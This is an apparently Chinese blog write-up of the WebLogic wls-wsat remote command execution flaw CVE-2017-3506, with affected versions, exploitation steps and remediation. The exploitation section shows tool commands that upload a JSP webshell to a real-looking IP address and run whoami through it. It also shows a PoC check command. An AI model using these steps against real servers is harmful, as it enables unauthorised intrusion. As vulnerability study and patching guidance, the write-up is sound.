weblogic wls-wsat组件远程命令执行(CVE-2017-3506)

所有文章,仅供安全研究与学习之用,后果自负!

weblogic wls-wsat组件远程命令执行(CVE-2017-3506)

前言

weblogic 反序列化(CVE-2017-10271)类似

一般情况下weblogic会开放7001以及7002端口

0x01 漏洞描述

wls-wsat组件远程命令执行

如果访问/wls-wsat/CoordinatorPortType11目录,存在下图则说明或许存在漏洞
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11

在这里插入图片描述

0x02 影响范围

OracleWebLogic Server10.3.6.0.0

OracleWebLogic Server12.1.3.0.0

OracleWebLogic Server12.2.1.1.0

OracleWebLogic Server12.2.1.2.0

0x03 漏洞利用

工具:

cve-2017-3506_webshell.jar

(1)查看使用方法
java -jar cve-2017-3506_webshell.jar

在这里插入图片描述
(2)单个url检查
显示漏洞存在
java -jar cve-2017-3506_webshell.jar -u http://118.193.36.37:57661
在这里插入图片描述
(3)上传木马

payload

端口后边有个空格 
java -jar cve-2017-3506_webshell.jar  -s http://118.193.36.37:57661 /wls-wsat/CoordinatorPortType11 shell1.jsp

在这里插入图片描述
(4)执行命令
payload:

http://118.193.36.37:57661/wls-wsat/shell1.jsp?password=secfree&command=whoami

在这里插入图片描述
在这里插入图片描述

cve-2017-3506_poc.py 检测是否存在

python2运行
(1) 运行查看使用方法
在这里插入图片描述
(2)检测是否存在漏洞

python2 cve-2017-3506_poc.py http://118.193.36.37:35509/

在这里插入图片描述

  • 显示存在漏洞

0x04 漏洞修复

1.删除war包
根据实际 环境 路径和业务需求,删除WebLogic程序下列war包及目录
rm -f/home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war
rm -f/home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
rm -rf/home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat
2.设置网络访问控制
配置 http://ip_address:7001/wls-wsat 网络访问控制策略,禁止外网可以直接访问。
3.更新补丁和扫描:
更新Oracle官方发布相关补丁,下载链接: http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html 。
3.检测和防御
阿里云态势感知已增加检测规则,支持入侵行为和漏洞检测,建议您开通态势感知(专业版以上版本)进行检测。

  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 17
    评论
评论 17
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值